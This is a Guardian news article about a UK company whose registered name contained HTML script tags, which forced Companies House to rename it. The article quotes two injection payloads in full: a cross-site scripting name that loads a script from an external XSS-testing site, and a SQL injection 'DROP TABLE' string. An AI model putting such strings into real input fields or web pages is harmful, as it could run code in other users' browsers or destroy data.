https://www.theguardian.com/uk-news/2020/nov/06/companies-house-forces-business-name-change-to-prevent-security-risk

[p] Skip to main contentSkip to navigation
Close dialogue1/1Next imagePrevious imageToggle caption
Skip to navigation
Print subscriptions
Newsletters
Sign in
US[ ]

  * US edition
  * UK edition
  * Australia edition
  * Europe edition
  * International edition

The Guardian - Back to homeThe Guardian
[ ]

  * News
  * Opinion
  * Sport
  * Culture
  * Lifestyle

Show moreHide expanded menu

  * [ ]News
      + View all News
      + US news
      + US elections 2024
      + World news
      + Environment
      + Ukraine
      + Soccer
      + Business
      + Tech
      + Science
      + Newsletters
      + Wellness
  * [ ]Opinion
      + View all Opinion
      + The Guardian view
      + Columnists
      + Letters
      + Opinion videos
      + Cartoons
  * [ ]Sport
      + View all Sport
      + Soccer
      + NFL
      + Tennis
      + MLB
      + MLS
      + NBA
      + WNBA
      + NHL
      + F1
      + Golf
  * [ ]Culture
      + View all Culture
      + Film
      + Books
      + Music
      + Art & design
      + TV & radio
      + Stage
      + Classical
      + Games
  * [ ]Lifestyle
      + View all Lifestyle
      + Wellness
      + Fashion
      + Food
      + Recipes
      + Love & sex
      + Home & garden
      + Health & fitness
      + Family
      + Travel
      + Money
  * Search input
    [                    ]
    google-search
    Search
      + Support us
      + Print subscriptions
  * 
      + Search jobs
      + Digital Archive
      + Guardian Licensing
      + About Us
      + The Guardian app
      + Video
      + Podcasts
      + Pictures
      + Inside the Guardian
      + Guardian Weekly
      + Crosswords
      + Wordiply
      + Corrections
  * Search input
    [                    ]
    google-search
    Search
      + Search jobs
      + Digital Archive
      + Guardian Licensing
      + About Us

  * UK
  * UK politics
  * Education
  * Media
  * Society
  * Law
  * Scotland
  * Wales
  * Northern Ireland

Desktop source code and technology background
[ ]
Including characters that are used in HTML code within a company name
may present a security risk, a Companies House spokesperson said.
Photograph: Khotcharak Siriwong/Alamy Stock Photo
View image in fullscreen
Including characters that are used in HTML code within a company name
may present a security risk, a Companies House spokesperson said.
Photograph: Khotcharak Siriwong/Alamy Stock Photo
UK news
This article is more than 3 years old

Company forced to change name that could be used to hack websites

This article is more than 3 years old

Software firm's director thought name using HTML would be 'fun and
playful'


Alex Hern UK technology editor

Fri 6 Nov 2020 14.55 ESTLast modified on Fri 6 Nov 2020 15.24 EST
Share

Companies House has forced a company to change its name after it
belatedly realised it could pose a security risk.

The company now legally known as "THAT COMPANY WHOSE NAME USED TO
CONTAIN HTML SCRIPT TAGS LTD" was set up by a British software
engineer, who says he did it purely because he thought it would be "a
fun playful name" for his consulting business.

He now says he didn't realise that Companies House was actually
vulnerable to the extremely simple technique he used, known as
"cross-site scripting", which allows an attacker to run code from one
website on another.

The original name of the company was ""><SCRIPT SRC=HTTPS://
MJT.XSS.HT> LTD". By beginning the name with a quotation mark and
chevron, any site which failed to properly handle the HTML code would
have mistakenly thought the company name was blank, and then loaded
and executed a script from the site XSS Hunter, which helps
developers find cross-site scripting errors.

That script would have simply put up a harmless alert - but it serves
as proof that a malicious attacker could instead have used the same
weakness as a gateway to more damaging ends.

Similar names have been registered in the past, such as "; DROP TABLE
"COMPANIES";-- LTD", a wry attempt to carry out an attack known as
SQL injection, inspired by a famous XKCD webcomic, but this was the
first such name to have prompted a response. Companies House has
retroactively removed the original name from its data feeds, and all
documentation referring to its original moniker now reads simply
"Company name available on request".

The director of the company, who asked not to be named, told the
Guardian: "Government Digital Service - GDS - have a good reputation
for security, and other companies with similarly playful names have
been registered in the past, so I thought there probably wouldn't be
a problem.

"When I discovered there were some minor problems, I contacted
Companies House and the National Cyber Security Centre immediately,
and didn't disclose the issue to anyone else."

He did not realise it would be an issue, he said, because characters
including > and " are explicitly allowed as company names, which
suggested that the agency had put security measures in place to
prevent such attacks.

A Companies House spokesperson said: "A company was registered using
characters that could have presented a security risk to a small
number of our customers, if published on unprotected external
websites. We have taken immediate steps to mitigate this risk and
have put measures in place to prevent a similar occurrence. We are
confident that Companies House services remain secure."

Explore more on these topics

  * UK news
  * Computing
  * news

Share
Reuse this content

Most viewed

Most viewed

  * UK
  * UK politics
  * Education
  * Media
  * Society
  * Law
  * Scotland
  * Wales
  * Northern Ireland

  * News
  * Opinion
  * Sport
  * Culture
  * Lifestyle

Original reporting and incisive analysis, direct from the Guardian
every morning
Sign up for our email

  * About us
  * Help
  * Complaints & corrections
  * SecureDrop
  * Work for us
  *  
  * Privacy policy
  * Cookie policy
  * Terms & conditions
  * Contact us

  * All topics
  * All writers
  * Digital newspaper archive
  * Tax strategy
  * Facebook
  * YouTube
  * Instagram
  * LinkedIn
  * X
  * Newsletters

  * Advertise with us
  * Guardian Labs
  * Search jobs

Back to top
(c) 2024 Guardian News & Media Limited or its affiliated companies. All
rights reserved. (dcr)